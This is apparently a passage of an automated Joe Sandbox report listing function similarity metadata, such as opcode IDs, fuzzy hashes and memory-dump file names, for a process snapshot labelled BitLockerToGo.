                                                                              • Instruction ID: 0816e173fe0e6e210fa60bc1254d3628fd9e2085806149b18e3a1fe85e364fff
                                                                              • Opcode Fuzzy Hash: 4f97890fe4297331055e40927051cc0301748eb2b94673d72afeb8727c0a31f8
                                                                              • Instruction Fuzzy Hash: 058188711082428FDB14DF28D89067B77A2ABE5315F184A6EE5C687342EF389906C7A7
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.2592473041.0000000000451000.00000020.00000400.00020000.00000000.sdmp, Offset: 00450000, based on PE: true
                                                                              • Associated: 00000005.00000002.2592455981.0000000000450000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2592504910.000000000048F000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2592523301.0000000000492000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2592544020.00000000004A3000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_450000_BitLockerToGo.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 4d12c17a84c532656340cc3f1595ba7b525cf2fc4270954224873b9c603cf68c
                                                                              • Instruction ID: 66eecce7571ae018a1f7b904e0504909d030901afb4b774b6ca990e992e2722f
                                                                              • Opcode Fuzzy Hash: 4d12c17a84c532656340cc3f1595ba7b525cf2fc4270954224873b9c603cf68c
                                                                              • Instruction Fuzzy Hash: 7DB10775A04301AFD7209F25EC41B1ABBE1BFD5319F144A3EF8D8972A1EB769C048B46
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.2592473041.0000000000451000.00000020.00000400.00020000.00000000.sdmp, Offset: 00450000, based on PE: true
                                                                              • Associated: 00000005.00000002.2592455981.0000000000450000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2592504910.000000000048F000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2592523301.0000000000492000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2592544020.00000000004A3000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_450000_BitLockerToGo.jbxd
                                                                              Similarity
                                                                              • API ID: InitializeThunk
                                                                              • String ID:
                                                                              • API String ID: 2994545307-0
                                                                              • Opcode ID: 026bd3c9510cf310fa9902082eab4049a7519e428abf10a1d6ae90b535d6193e
                                                                              • Instruction ID: 7f7e22c9cc370b0ffb862f364e3bced6c128c7a65f21c9a600a62f7594d133df
                                                                              • Opcode Fuzzy Hash: 026bd3c9510cf310fa9902082eab4049a7519e428abf10a1d6ae90b535d6193e
                                                                              • Instruction Fuzzy Hash: BBA1F2316083119BC724EF29C880A6FB3E6FFD5700F09896EE9918B365DB74AC50CB95
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.2592473041.0000000000451000.00000020.00000400.00020000.00000000.sdmp, Offset: 00450000, based on PE: true
                                                                              • Associated: 00000005.00000002.2592455981.0000000000450000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2592504910.000000000048F000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2592523301.0000000000492000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2592544020.00000000004A3000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_450000_BitLockerToGo.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: f5e1f6d6d41b33dcc1d7af4081bf4dad27c38724dbded58f3f2f298d8ebbcccb
                                                                              • Instruction ID: 15e32c292d24fd754b882d4b1dba07f269e8c35907c7f4c21fba0ef7e91ccc69
                                                                              • Opcode Fuzzy Hash: f5e1f6d6d41b33dcc1d7af4081bf4dad27c38724dbded58f3f2f298d8ebbcccb
                                                                              • Instruction Fuzzy Hash: BDA1ED30618241CFD708EF38E89066AB7E1FB9A315F1A897EE58683251D739E941CB49
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.2592473041.0000000000451000.00000020.00000400.00020000.00000000.sdmp, Offset: 00450000, based on PE: true
                                                                              • Associated: 00000005.00000002.2592455981.0000000000450000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2592504910.000000000048F000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2592523301.0000000000492000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2592544020.00000000004A3000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_450000_BitLockerToGo.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 5bfc4140317955726610524b6fdf5330057cfd16a0da2b735fe1ad62c154eb66
                                                                              • Instruction ID: 8ad71a82ed3f7afcb8b3a2008596e4d368a526b28b86067857b855978e9b8b38
                                                                              • Opcode Fuzzy Hash: 5bfc4140317955726610524b6fdf5330057cfd16a0da2b735fe1ad62c154eb66
                                                                              • Instruction Fuzzy Hash: 4FB10431A14151CFCB14CF28D8517AEBBB3BF9A320F1A82AAD455AB3D1C7349D42CB94
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.2592473041.0000000000451000.00000020.00000400.00020000.00000000.sdmp, Offset: 00450000, based on PE: true
                                                                              • Associated: 00000005.00000002.2592455981.0000000000450000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2592504910.000000000048F000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2592523301.0000000000492000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2592544020.00000000004A3000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_450000_BitLockerToGo.jbxd
                                                                              Similarity
                                                                              • API ID: InitializeThunk
                                                                              • String ID:
                                                                              • API String ID: 2994545307-0
                                                                              • Opcode ID: da216b012b3d49078de80a65f16ec0adb656deacf3085f736745bc9c6d7906a1
                                                                              • Instruction ID: e4faa7cc702dfb9844232055508dde857f54bd6b2ca4bd9ed5a5c88aca41d8e6
                                                                              • Opcode Fuzzy Hash: da216b012b3d49078de80a65f16ec0adb656deacf3085f736745bc9c6d7906a1
                                                                              • Instruction Fuzzy Hash: CFA1E231A053118BC729DF28C490A7FB3E2EFD9304F15896EE9869B394DB34AC51CB85
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.2592473041.0000000000451000.00000020.00000400.00020000.00000000.sdmp, Offset: 00450000, based on PE: true
                                                                              • Associated: 00000005.00000002.2592455981.0000000000450000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2592504910.000000000048F000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2592523301.0000000000492000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2592544020.00000000004A3000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_450000_BitLockerToGo.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: f8d9b9ce4d018fd2524abc10b387267cbb61429f86c7d30272f52c069b9f06a3
                                                                              • Instruction ID: 598103bee8da28191d2a8b2a3674866ae32b02ff3f752f1bf875fabe4818351c
                                                                              • Opcode Fuzzy Hash: f8d9b9ce4d018fd2524abc10b387267cbb61429f86c7d30272f52c069b9f06a3
                                                                              • Instruction Fuzzy Hash: F8C15BB29087418FC360CF28CC867ABB7E1BB85318F49492DD5D9C7242E778A159CB0A
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.2592473041.0000000000451000.00000020.00000400.00020000.00000000.sdmp, Offset: 00450000, based on PE: true
                                                                              • Associated: 00000005.00000002.2592455981.0000000000450000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2592504910.000000000048F000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2592523301.0000000000492000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2592544020.00000000004A3000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_450000_BitLockerToGo.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: b367b4b8323647d3df08f9bc05a11f02a49e75c6329056839b3c06dd6bf05e77
                                                                              • Instruction ID: 1520d8b2dffeb82e14a224db8e64ef0aaa5057bc8eb873a096d6f0b472331109
                                                                              • Opcode Fuzzy Hash: b367b4b8323647d3df08f9bc05a11f02a49e75c6329056839b3c06dd6bf05e77
                                                                              • Instruction Fuzzy Hash: FE913637B59A804BD328897E4C153AAAA834BD6330F2DC37FA9B5C73E5D96C4C064346
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.2592473041.0000000000451000.00000020.00000400.00020000.00000000.sdmp, Offset: 00450000, based on PE: true
                                                                              • Associated: 00000005.00000002.2592455981.0000000000450000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2592504910.000000000048F000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2592523301.0000000000492000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2592544020.00000000004A3000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_450000_BitLockerToGo.jbxd
                                                                              Similarity
                                                                              • API ID: InitializeThunk
                                                                              • String ID:
                                                                              • API String ID: 2994545307-0
                                                                              • Opcode ID: 3bb308d2cac15941bef27c0e6a92355f6c5093aec1be850d82f29a2589a9effb
                                                                              • Instruction ID: 4b467f7ae1dec37f9abd9b5af98a7d2759f06a72dae83dd0e9d4af1f34716801
                                                                              • Opcode Fuzzy Hash: 3bb308d2cac15941bef27c0e6a92355f6c5093aec1be850d82f29a2589a9effb
                                                                              • Instruction Fuzzy Hash: 57716C7B6497109FE724CA29DCC063B7393EBD8315F2A422EE5CA47302DB399C018756
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.2592473041.0000000000451000.00000020.00000400.00020000.00000000.sdmp, Offset: 00450000, based on PE: true
                                                                              • Associated: 00000005.00000002.2592455981.0000000000450000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2592504910.000000000048F000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2592523301.0000000000492000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2592544020.00000000004A3000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_450000_BitLockerToGo.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 7333e486de9cfa855b3c056ab00a2a36d6f433a739890f75b94d8d20b23dbc0e
                                                                              • Instruction ID: 4cee561f308b0542de4acf8b631ad06187efdea6cd793eea64861274b4435d99
                                                                              • Opcode Fuzzy Hash: 7333e486de9cfa855b3c056ab00a2a36d6f433a739890f75b94d8d20b23dbc0e
                                                                              • Instruction Fuzzy Hash: BA712A7150C3D24BD3598B3484E027BFFE19FA3305F58459EE4D247392E76988068B9A
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.2592473041.0000000000451000.00000020.00000400.00020000.00000000.sdmp, Offset: 00450000, based on PE: true
                                                                              • Associated: 00000005.00000002.2592455981.0000000000450000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2592504910.000000000048F000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2592523301.0000000000492000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2592544020.00000000004A3000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_450000_BitLockerToGo.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: bb2c6609698d81d2714a15e21917e366da150c223e694a683a14195b259111d3
                                                                              • Instruction ID: 6b62f98f75f0e7be479624a0e552a2408e599d21f20e528c92acbc7a5d6b2590
                                                                              • Opcode Fuzzy Hash: bb2c6609698d81d2714a15e21917e366da150c223e694a683a14195b259111d3
                                                                              • Instruction Fuzzy Hash: 94A107B1604B408FC714EF38D58536BBBE1AB85314F14493ED8EB87392EA78A449CB07
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.2592473041.0000000000451000.00000020.00000400.00020000.00000000.sdmp, Offset: 00450000, based on PE: true
                                                                              • Associated: 00000005.00000002.2592455981.0000000000450000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2592504910.000000000048F000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2592523301.0000000000492000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2592544020.00000000004A3000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_450000_BitLockerToGo.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: cb2fc1234f6f72498ada3317d4e6a253d8b240fb0e0ca74bdfd0fae8a3d5f7a4
                                                                              • Instruction ID: e9c14787988ce34b59d0b8a989900263c3ad3fe5368beef672a54dd0b9b37fbc
                                                                              • Opcode Fuzzy Hash: cb2fc1234f6f72498ada3317d4e6a253d8b240fb0e0ca74bdfd0fae8a3d5f7a4
                                                                              • Instruction Fuzzy Hash: 6081E736B155914FC7289A7C4C512EA6A934B96230B2DC3BFE9B5CB3E5C12C480A9365
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.2592473041.0000000000451000.00000020.00000400.00020000.00000000.sdmp, Offset: 00450000, based on PE: true
                                                                              • Associated: 00000005.00000002.2592455981.0000000000450000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2592504910.000000000048F000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2592523301.0000000000492000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2592544020.00000000004A3000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_450000_BitLockerToGo.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: ce840f0fccf3fcf596c08471d3834f28572d989e664757c61bd7d21a53172fd3
                                                                              • Instruction ID: 0eda1d99e2b84f8dc43cc264ced1d51c53352421514f9be6b28875c85026bae9
                                                                              • Opcode Fuzzy Hash: ce840f0fccf3fcf596c08471d3834f28572d989e664757c61bd7d21a53172fd3
                                                                              • Instruction Fuzzy Hash: 57613636749A804BD328997D9C512A67AC34BE7334F3DC37FE5B1873E5E5684802434A
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.2592473041.0000000000451000.00000020.00000400.00020000.00000000.sdmp, Offset: 00450000, based on PE: true
                                                                              • Associated: 00000005.00000002.2592455981.0000000000450000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2592504910.000000000048F000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2592523301.0000000000492000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2592544020.00000000004A3000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_450000_BitLockerToGo.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: e19f933745de8a320033e75feff5a4c66d7f7d14cc8cb920f63abc69e678dc77
                                                                              • Instruction ID: b6a26941997dca4ce88313e71328cdae36257cff630b11ad52861093e34fe15b
                                                                              • Opcode Fuzzy Hash: e19f933745de8a320033e75feff5a4c66d7f7d14cc8cb920f63abc69e678dc77
                                                                              • Instruction Fuzzy Hash: B2510933B69A900F9328997D5C1226AB9870BD7334B3DC77BA6B1C73F5D5A888035344
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.2592473041.0000000000451000.00000020.00000400.00020000.00000000.sdmp, Offset: 00450000, based on PE: true
                                                                              • Associated: 00000005.00000002.2592455981.0000000000450000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2592504910.000000000048F000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2592523301.0000000000492000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2592544020.00000000004A3000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_450000_BitLockerToGo.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: ebffd04c3239f1d1153b21a54b86ffc57ca05fb05ebe1c3bb60ddee673ceb43f
                                                                              • Instruction ID: 519150f25ed6af70183553f814f53356ff0136e66e3d59860b09ef9a3d6fa58d
                                                                              • Opcode Fuzzy Hash: ebffd04c3239f1d1153b21a54b86ffc57ca05fb05ebe1c3bb60ddee673ceb43f
                                                                              • Instruction Fuzzy Hash: 6D5124716083009BE714EF28DC56B3FBBA5EB94304F188D3EE98687291DA39DD01C796
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.2592473041.0000000000451000.00000020.00000400.00020000.00000000.sdmp, Offset: 00450000, based on PE: true
                                                                              • Associated: 00000005.00000002.2592455981.0000000000450000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2592504910.000000000048F000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2592523301.0000000000492000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2592544020.00000000004A3000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_450000_BitLockerToGo.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 550b5453ddd5697494a974567a8079cd0f6224ad98dd8e8e9d0a3f6a0a9672a3
                                                                              • Instruction ID: 84b3985e849056dad548b059ae0d8e330140f19019db6f2b245d1ce7411101ca
                                                                              • Opcode Fuzzy Hash: 550b5453ddd5697494a974567a8079cd0f6224ad98dd8e8e9d0a3f6a0a9672a3
                                                                              • Instruction Fuzzy Hash: BA61C6316086514FDB25DE2DC8802ABB6D36B86330F19C72EE5BD8B3E5D7389C418749
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.2592473041.0000000000451000.00000020.00000400.00020000.00000000.sdmp, Offset: 00450000, based on PE: true
                                                                              • Associated: 00000005.00000002.2592455981.0000000000450000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2592504910.000000000048F000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2592523301.0000000000492000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2592544020.00000000004A3000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_450000_BitLockerToGo.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: c49ee82d427ecd4fff27805c7fcdcbcaa8a5ec2dcae86f44678328fd3bfb153b
                                                                              • Instruction ID: 63364a84d00faf48a018ed2555276ae2682217f4ebc327b018f1e26c8c9bece3
                                                                              • Opcode Fuzzy Hash: c49ee82d427ecd4fff27805c7fcdcbcaa8a5ec2dcae86f44678328fd3bfb153b
                                                                              • Instruction Fuzzy Hash: 456139355083909FC325CF29E89092E7BD0AB96314F4885BEE8D447392D636DC09CB96
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.2592473041.0000000000451000.00000020.00000400.00020000.00000000.sdmp, Offset: 00450000, based on PE: true
                                                                              • Associated: 00000005.00000002.2592455981.0000000000450000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2592504910.000000000048F000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2592523301.0000000000492000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2592544020.00000000004A3000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_450000_BitLockerToGo.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 55ef6180e002719f520b655d528f7097ff498507f44e967d95c04c0ebba15ba5
                                                                              • Instruction ID: eec60798634a9e5d9893a6a9fda50314ded1e4e8015c73c747fd535498ac18cc
                                                                              • Opcode Fuzzy Hash: 55ef6180e002719f520b655d528f7097ff498507f44e967d95c04c0ebba15ba5
                                                                              • Instruction Fuzzy Hash: 8A516CB15087548FE314EF29D49435FBBE1BB84318F054E2EE5E987391E379DA088B86
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.2592473041.0000000000451000.00000020.00000400.00020000.00000000.sdmp, Offset: 00450000, based on PE: true
                                                                              • Associated: 00000005.00000002.2592455981.0000000000450000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2592504910.000000000048F000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2592523301.0000000000492000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2592544020.00000000004A3000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_450000_BitLockerToGo.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 092554a78e2b289e403ca210a48e3a2c8941e405cfb711901250960d81902d02
                                                                              • Instruction ID: 575e9f0e1fdcea2d41472433a5c7e03ab3573de6b499b986d2a86e440970774f
                                                                              • Opcode Fuzzy Hash: 092554a78e2b289e403ca210a48e3a2c8941e405cfb711901250960d81902d02
                                                                              • Instruction Fuzzy Hash: 6F512632A147108BD720EA2DC88057FB7E2FBD5314F1E892AD9859B351E6359C01C7D5
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.2592473041.0000000000451000.00000020.00000400.00020000.00000000.sdmp, Offset: 00450000, based on PE: true
                                                                              • Associated: 00000005.00000002.2592455981.0000000000450000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2592504910.000000000048F000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2592523301.0000000000492000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2592544020.00000000004A3000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_450000_BitLockerToGo.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 94a7247c4fd5bc06d0ae417b1f9bad8269af33d23ceed7a289b104283fa2a2a3
                                                                              • Instruction ID: 4298000a99694d3760b85263ab1dc469369443e9c6bddde92d22a283b939c0e0
                                                                              • Opcode Fuzzy Hash: 94a7247c4fd5bc06d0ae417b1f9bad8269af33d23ceed7a289b104283fa2a2a3
                                                                              • Instruction Fuzzy Hash: E0510B22749A814BD338897C9C613A67A938BE7334F2CC77BE5B1C73E1E65948464387
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.2592473041.0000000000451000.00000020.00000400.00020000.00000000.sdmp, Offset: 00450000, based on PE: true
                                                                              • Associated: 00000005.00000002.2592455981.0000000000450000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2592504910.000000000048F000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2592523301.0000000000492000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2592544020.00000000004A3000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_450000_BitLockerToGo.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 23b86555ce2a695d0511db9aff25f2c561b64c1b68d1782900c463b72642fbea
                                                                              • Instruction ID: f025aeafef083ac54580a5f01a0fd5b09736137630a1ee4606c070bdccb5c720
                                                                              • Opcode Fuzzy Hash: 23b86555ce2a695d0511db9aff25f2c561b64c1b68d1782900c463b72642fbea
                                                                              • Instruction Fuzzy Hash: FB41FA22B0827147CB188E2D8D9017ABAD39FC6215F0EC63BECD99B787D1789D0497D4
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.2592473041.0000000000451000.00000020.00000400.00020000.00000000.sdmp, Offset: 00450000, based on PE: true
                                                                              • Associated: 00000005.00000002.2592455981.0000000000450000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2592504910.000000000048F000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2592523301.0000000000492000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2592544020.00000000004A3000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_450000_BitLockerToGo.jbxd
                                                                              Similarity
                                                                              • API ID: InitializeThunk
                                                                              • String ID:
                                                                              • API String ID: 2994545307-0
                                                                              • Opcode ID: 744b691c0e313911e2d45083593910c7f644f3580d43c3080491736fc7fc33ff
                                                                              • Instruction ID: 9d1651d086a1f43b149a636789ec11e089313b7f83c84912226922a3a6231b69
                                                                              • Opcode Fuzzy Hash: 744b691c0e313911e2d45083593910c7f644f3580d43c3080491736fc7fc33ff
                                                                              • Instruction Fuzzy Hash: 1C411475A05301AFEB14EB25DC84F7FB3A6EB95304F14883EE28597290D728AD14C759
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.2592473041.0000000000451000.00000020.00000400.00020000.00000000.sdmp, Offset: 00450000, based on PE: true
                                                                              • Associated: 00000005.00000002.2592455981.0000000000450000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2592504910.000000000048F000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2592523301.0000000000492000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2592544020.00000000004A3000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_450000_BitLockerToGo.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 8c7910782736839ac4350097b99fbc12cc190367cc94b7902d2fa63f6ea209b7
                                                                              • Instruction ID: d96c9e78e08fe178725b65709d899e8afae6f318f8d62b852401ffb2b7c5cf91
                                                                              • Opcode Fuzzy Hash: 8c7910782736839ac4350097b99fbc12cc190367cc94b7902d2fa63f6ea209b7
                                                                              • Instruction Fuzzy Hash: 8931FC77A087284B8324AE598C8216BF7E9EBCD614F1AC92FDC94A7311F674DD0287C5
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.2592473041.0000000000451000.00000020.00000400.00020000.00000000.sdmp, Offset: 00450000, based on PE: true
                                                                              • Associated: 00000005.00000002.2592455981.0000000000450000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2592504910.000000000048F000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2592523301.0000000000492000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2592544020.00000000004A3000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_450000_BitLockerToGo.jbxd
